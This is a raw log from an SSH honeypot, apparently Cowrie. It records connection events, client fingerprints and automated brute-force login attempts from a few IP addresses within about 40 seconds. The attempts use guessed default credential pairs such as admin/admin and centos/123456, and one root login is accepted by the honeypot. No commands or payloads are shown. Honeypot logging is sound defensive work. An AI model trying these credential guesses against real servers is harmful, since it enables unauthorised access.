{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T21:44:44.619068Z","src_ip":"121.227.152.250","session":"57a2c3a2b089"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T21:44:44.812576Z","src_ip":"121.227.152.250","session":"57a2c3a2b089"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37666,"dst_ip":"1.2.3.4","dst_port":22,"session":"58cb2082a195","protocol":"ssh","message":"New connection: 212.227.125.160:37666 (1.2.3.4:22) [session: 58cb2082a195]","sensor":"my-vps","timestamp":"2025-08-26T21:44:45.280715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:44:45.281615Z","src_ip":"212.227.125.160","session":"58cb2082a195"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:44:45.348456Z","src_ip":"212.227.125.160","session":"58cb2082a195"}
{"eventid":"cowrie.login.failed","username":"tbds","password":"tbds","message":"login attempt [tbds/tbds] failed","sensor":"my-vps","timestamp":"2025-08-26T21:44:45.577877Z","src_ip":"212.227.125.160","session":"58cb2082a195"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:44:45.627412Z","src_ip":"121.227.152.250","session":"57a2c3a2b089"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:45.821968Z","src_ip":"121.227.152.250","session":"57a2c3a2b089"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:45.832173Z","src_ip":"121.227.152.250","session":"b118bfd67a44"}
{"eventid":"cowrie.session.closed","duration":31.628555297851562,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:46.023968Z","src_ip":"212.227.125.160","session":"495fc3d500d5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:46.869165Z","src_ip":"212.227.125.160","session":"58cb2082a195"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33050,"dst_ip":"1.2.3.4","dst_port":22,"session":"924726e9f1b0","protocol":"ssh","message":"New connection: 212.227.125.160:33050 (1.2.3.4:22) [session: 924726e9f1b0]","sensor":"my-vps","timestamp":"2025-08-26T21:44:50.930139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:44:50.931070Z","src_ip":"212.227.125.160","session":"924726e9f1b0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:44:50.989215Z","src_ip":"212.227.125.160","session":"924726e9f1b0"}
{"eventid":"cowrie.login.failed","username":"yealink","password":"yealink","message":"login attempt [yealink/yealink] failed","sensor":"my-vps","timestamp":"2025-08-26T21:44:51.159719Z","src_ip":"212.227.125.160","session":"924726e9f1b0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:52.231624Z","src_ip":"212.227.125.160","session":"924726e9f1b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56672,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0cf1ee10ca2","protocol":"ssh","message":"New connection: 212.227.125.160:56672 (1.2.3.4:22) [session: c0cf1ee10ca2]","sensor":"my-vps","timestamp":"2025-08-26T21:44:56.060991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:44:56.073309Z","src_ip":"212.227.125.160","session":"c0cf1ee10ca2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:44:56.157547Z","src_ip":"212.227.125.160","session":"c0cf1ee10ca2"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:44:56.621987Z","src_ip":"212.227.125.160","session":"c0cf1ee10ca2"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:44:57.718995Z","src_ip":"212.227.125.160","session":"c0cf1ee10ca2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56934,"dst_ip":"1.2.3.4","dst_port":22,"session":"c53d82eb458e","protocol":"ssh","message":"New connection: 212.227.235.229:56934 (1.2.3.4:22) [session: c53d82eb458e]","sensor":"my-vps","timestamp":"2025-08-26T21:44:58.619835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:44:59.857233Z","src_ip":"212.227.235.229","session":"c53d82eb458e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:44:59.857932Z","src_ip":"212.227.235.229","session":"c53d82eb458e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52060,"dst_ip":"1.2.3.4","dst_port":22,"session":"27cabf44c2e4","protocol":"ssh","message":"New connection: 212.227.125.160:52060 (1.2.3.4:22) [session: 27cabf44c2e4]","sensor":"my-vps","timestamp":"2025-08-26T21:45:01.698556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:45:01.703851Z","src_ip":"212.227.125.160","session":"27cabf44c2e4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:45:01.769541Z","src_ip":"212.227.125.160","session":"27cabf44c2e4"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:45:01.934783Z","src_ip":"212.227.125.160","session":"27cabf44c2e4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:02.981322Z","src_ip":"212.227.125.160","session":"27cabf44c2e4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"wasd","message":"login attempt [admin/wasd] failed","sensor":"my-vps","timestamp":"2025-08-26T21:45:04.576232Z","src_ip":"212.227.235.229","session":"c53d82eb458e"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:07.239443Z","src_ip":"212.227.235.229","session":"c53d82eb458e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47448,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cd8c3cd1f8d","protocol":"ssh","message":"New connection: 212.227.125.160:47448 (1.2.3.4:22) [session: 7cd8c3cd1f8d]","sensor":"my-vps","timestamp":"2025-08-26T21:45:07.389364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:45:07.394085Z","src_ip":"212.227.125.160","session":"7cd8c3cd1f8d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:45:07.439425Z","src_ip":"212.227.125.160","session":"7cd8c3cd1f8d"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-26T21:45:07.639302Z","src_ip":"212.227.125.160","session":"7cd8c3cd1f8d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:08.707319Z","src_ip":"212.227.125.160","session":"7cd8c3cd1f8d"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:11.814447Z","src_ip":"212.227.125.160","session":"c648e53bf4a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42832,"dst_ip":"1.2.3.4","dst_port":22,"session":"448a7e789dd3","protocol":"ssh","message":"New connection: 212.227.125.160:42832 (1.2.3.4:22) [session: 448a7e789dd3]","sensor":"my-vps","timestamp":"2025-08-26T21:45:12.911792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:45:12.927268Z","src_ip":"212.227.125.160","session":"448a7e789dd3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:45:12.962133Z","src_ip":"212.227.125.160","session":"448a7e789dd3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:45:13.160731Z","src_ip":"212.227.125.160","session":"448a7e789dd3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:14.220196Z","src_ip":"212.227.125.160","session":"448a7e789dd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38218,"dst_ip":"1.2.3.4","dst_port":22,"session":"c40c77407936","protocol":"ssh","message":"New connection: 212.227.125.160:38218 (1.2.3.4:22) [session: c40c77407936]","sensor":"my-vps","timestamp":"2025-08-26T21:45:18.447917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:45:18.462692Z","src_ip":"212.227.125.160","session":"c40c77407936"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:45:18.517930Z","src_ip":"212.227.125.160","session":"c40c77407936"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-26T21:45:18.815681Z","src_ip":"212.227.125.160","session":"c40c77407936"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:20.119092Z","src_ip":"212.227.125.160","session":"c40c77407936"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33604,"dst_ip":"1.2.3.4","dst_port":22,"session":"58c96405e642","protocol":"ssh","message":"New connection: 212.227.125.160:33604 (1.2.3.4:22) [session: 58c96405e642]","sensor":"my-vps","timestamp":"2025-08-26T21:45:25.067662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:45:25.068790Z","src_ip":"212.227.125.160","session":"58c96405e642"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:45:25.521508Z","src_ip":"212.227.125.160","session":"58c96405e642"}
{"eventid":"cowrie.login.failed","username":"cloud-user","password":"cloud-user","message":"login attempt [cloud-user/cloud-user] failed","sensor":"my-vps","timestamp":"2025-08-26T21:45:25.919894Z","src_ip":"212.227.125.160","session":"58c96405e642"}
